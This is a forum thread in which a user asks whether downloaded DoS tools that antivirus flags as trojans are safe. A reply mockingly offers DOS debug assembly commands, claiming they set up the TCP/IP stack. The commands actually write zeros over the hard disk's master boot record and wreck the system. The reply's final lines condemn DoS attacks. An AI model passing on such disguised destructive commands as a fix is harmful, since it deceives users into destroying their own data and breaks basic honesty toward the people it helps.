Thread: Help Me!!!

Angry Help Me!!!

Hey, whats up all?

I have a very very very important question for you all! I really need an answer badly.. I downloaded some DoS (Denial Of Service) tools from the downloads section and what not.. well I got death n destruction, and some others.. they say they are trojans.. I have heard JP say that they are for the program and meant to be in there and stuff and that they scan all there files... well why would they need to have a trojan horse in more than 5/6 files I downloaded for DoS... This is very confusing and I would really like to know... If I actually opened the so called "trojan horse" would I be available for market to JP and stuff lol... I need someone to help me with this.. I don't like my norton antivirus thing popping up saying the file I have been looking for for a long long time has a trojan horse in it.. and I really don't like to see trojans on my system....

larryjs
    OH MY GAWWD! Not another one! Here kiddie lets prep your system for using Ddos tools. First boot from a windows start-up disk . go to the A prompt and type debug(this will allow you to set up your system's tcpip stack. After you type debug you get a little "-" in place of the cursor. now start at "f' and type exactly what you see..this will fix you right up.
    A:\>debug <enter>
    -F 200 L1000 0 <enter>
    -A CS:100 <enter>
    xxxx:0100 MOV AX,301 <enter>
    xxxx:0103 MOV BX,200 <enter>
    xxxx:0106 MOV CX,1 <enter>
    xxxx:0109 MOV DX,80 <enter>

(80 for hd 0 or 81 for hd 1 )

xxxx:010C INT 13 <enter>
    xxxx:010E INT 20 <enter>
    xxxx:0110 <enter>
    -g <enter>
    Program terminated normally
    -q<enter

You deserve it! DOS attacks are clumsy, uncontrollable and hit innocent people as often as the target. Not to mension that most ISPs will kick you if not cal the FBI over any serious DOS attempt. DOSing is the resort of internet thugs and criminals
    The sky above the port was the color of a television, tuned to a dead channel- Neuromancer